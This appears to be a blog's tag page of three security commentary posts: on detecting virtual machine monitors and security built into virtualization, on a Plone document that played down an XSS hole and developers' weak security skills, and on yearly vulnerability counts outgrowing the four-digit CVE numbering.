Posts tagged secure-programming

Page Content

Thoughts on Virtualization, Security and Singularity

The “VMM Detection Myths and Realities” paper has been heavily reported and discussed before.  It considers whether a theoretical piece of software could detect if it is running inside a Virtual Machine Monitor (VMM).  An undetectable VMM would be “transparent”.  Many arguments are made against the practicality or the commercial viability of a VMM that could provide performance, stealth and reproducible, consistent timings.  The arguments are interesting and reasonably convincing that it is currently infeasible to absolutely guarantee undetectability. 

However, I note that the authors are arguing from essentially the same position as atheists arguing that there is no God.  They argue that the existence of a fully transparent VMM is unlikely, impractical or would require an absurd amount of resources, both physical and in software development efforts.  This is reasonable because the VMM has to fail only once in preventing detection and there are many ways in which it can fail, and preventing each kind of detection is complex.  However, this is not an hermetic, formal proof that it is impossible and cannot exist;  a new breakthrough technology or an “alien science-fiction” god-like technology might make it possible. 

Then the authors argue that with the spread of virtualization, it will become a moot point for malware to try to detect if it is running inside a virtual machine.  One might be tempted to remark, doesn’t this argument also work in the other way, making it a moot point for an operating system or a security tool to try to detect if it is running inside a malicious VMM? 

McAfee’s “secure virtualization”
The security seminar by George Heron answers some of the questions I was asking at last year’s VMworld conference, and elaborates on what I had in mind then.  The idea is to integrate security functions within the virtual machine monitor.  Malware nowadays prevents the installation of security tools and interferes with them as much as possible.  If malware is successfully confined inside a virtual machine, and the security tools are operating from outside that scope, this could make it impossible for an attacker to disable security tools.  I really like that idea. 
 
The security tools could reasonably expect to run directly on the hardware or with an unvirtualized host OS.  Because of this, VMM detection isn’t a moot point for the defender.  However, the presentation did not discuss whether the McAfee security suite would attempt to detect if the VMM itself had been virtualized by an attacker.  Also, would it be possible to detect a “bad” VMM if the McAfee security tools themselves run inside a virtualized environment on top of the “good” VMM?  Perhaps it would need more hooks into the VMM to do this.  Many, in fact, to attempt to catch any of all the possible ways in which a malicious VMM can fail to hide itself properly.  What is the cost of all these detection attempts, which must be executed regularly?  Aren’t they prohibitive, therefore making strong malicious VMM detection impractical?  In the end, I believe this may be yet another race depending on how much effort each side is willing to put into cloaking and detection.  Practical detection is almost as hard as practical hiding, and the detection cost has to be paid everywhere on every machine, all the time.


Which Singularity?
Microsoft’s Singularity project attempts to create an OS and execution environment that is secure by design and simpler.  What strikes me is how it resembles the “white list” approach I’ve been talking about.  “Singularity” is about constructing secure systems with statements (“manifests”) in a provable manner.  It states what processes do and what may happen, instead of focusing on what must not happen. 

Last year I thought that virtualization and security could provide a revolution;  now I think it’s more of the same “keep building defective systems and defend them vigorously”, just somewhat stronger.  Even if I find the name somewhat arrogant, “Singularity” suggests a future for security that is more attractive and fundamentally stable than yet another arms race.  In the meantime, though, “secure virtualization” should help, and expect lots of marketing about it.

Do Open Source Devs Get Web App Security?  Does Anybody?

Note: I’ve updated this article after getting some feedback from Alexander Limi.

A colleague of mine who is dealing with Plone, a CMS system built atop Zope, pointed me to a rather disturbing document in the Plone Documentation system, one that I feel is indicative of a much larger problem in the web app dev community.

The first describes a hole (subsequently patched) in Plone that allowed users to upload arbitrary JavaScript.  Apparently no input or output filtering was being done.  Certainly anyone familiar with XSS attacks can see the potential for stealing cookie data, but the article seems to imply this is simply a spam issue:

Clean up link spam

Is this a security hole?
No. This is somebody logging in to your site (if you allow them to create their own users) and adding content that can redirect people to a different web site. Your server, site and content security is not compromised in any way. It’s just a slightly more sophisticated version of comment spam. If you open up your site to untrusted users, there will always be a certain risk that people add content that is not approved. It’s annoying, but it’s not a security hole.

Well, yes, actually, it is a security hole.  If one can place JavaScript on your site that redirects the user to another page, they can certainly place JavaScript on your site that grabs a user’s cookie data and redirects that to another site.  Whether or not they’ll get something useful from the data varies from app to app, of course. What’s worrisome is that it appears as if one of Plone’s founders (the byline on this document is for Alexander Limi, whose user page describes him as “one of Plone’s original founders.”) doesn’t seem to think this is a security issue. After getting feedback from Alexander Limi, it seems clear that he does understand the user-level security implications of the vulnerability, but was trying to make the distinction that there was no security risk to the Plone site itself.  Still, the language of the document is (unintentionally) misleading, and it’s very reminiscent of the kinds of misunderstandings and excuses I see all the time in open-source web app development.

The point here is (believe it or not) not to pick on Plone.  This is a problem prevalent in most open source development (and in closed source dev, from my experience).  People who simply shouldn’t be doing coding are doing the coding—and the implementation and maintenance.

Let’s be blunt: A web developer is not qualified to do the job if he or she does not have a good understanding of web application security concepts and techniques.  Leaders of development teams must stop allowing developers who are weak on security techniques to contribute to their products, and managers need to stop hiring candidates who do not demonstrate a solid secure programming background.  If they continue to do so, they demonstrate a lack of concern for the safety of their customers.

Educational initiatives must be stepped up to address this, both on the traditional academic level and in continuing education/training programs.  Students in web development curriculums at the undergrad level need to be taught the importance of security and effective secure programming techniques.  Developers in the workforce today need to have access to materials and programs that will do the same.  And the managerial level needs to be brought up to speed on what to look for in the developers they hire, so that under-qualifed and unqualified developers are no longer the norm on most web dev teams.

 

2007: The year of the 9,999 vulnerabilities?

A look at the National Vulnerability Database statistics will reveal that the number of vulnerabilities found yearly has greatly increased since 2003:

YearVulnerabilities%Increase
20021959N/A
20031281-35%
2004236785%
20054876106%
2006660535%



Average yearly increase (including the 2002-2003 decline): 48%

6605*1.48= 9775

So, that’s not quite 9999, but fairly close.  There’s enough variance that hitting 9999 in 2007 seems a plausible event.  If not in 2007, then it seems likely that we’ll hit 9999 in 2008.  So, what does it matter?



MITRE’s CVE effort uses a numbering scheme for vulnerabilities that can accomodate only 9999 vulnerabilities:  CVE-YEAR-XXXX.  Many products and vulnerability databases that are CVE-compatible (e.g., my own Cassandra service, CIRDB, etc…) use a field of fixed size just big enough for that format.  We’re facing a problem similar, although much smaller in scope, to the year-2000 overflow.  When the board of editors of the CVE was formed, the total number of vulnerabilities known, not those found yearly, was in the hundreds.  A yearly number of 9999 seemed astronomical;  I’m sure that anyone who would have brought up that as a concern back then would have been laughed at.  I felt at the time that it would take a security apocalypse to reach that.  Yet there we are, and a fair warning to everyone using or developing CVE-compatible products.



Kudos to the National Vulnerability Database and the MITRE CVE teams for keeping up under the onslaught.  I’m impressed.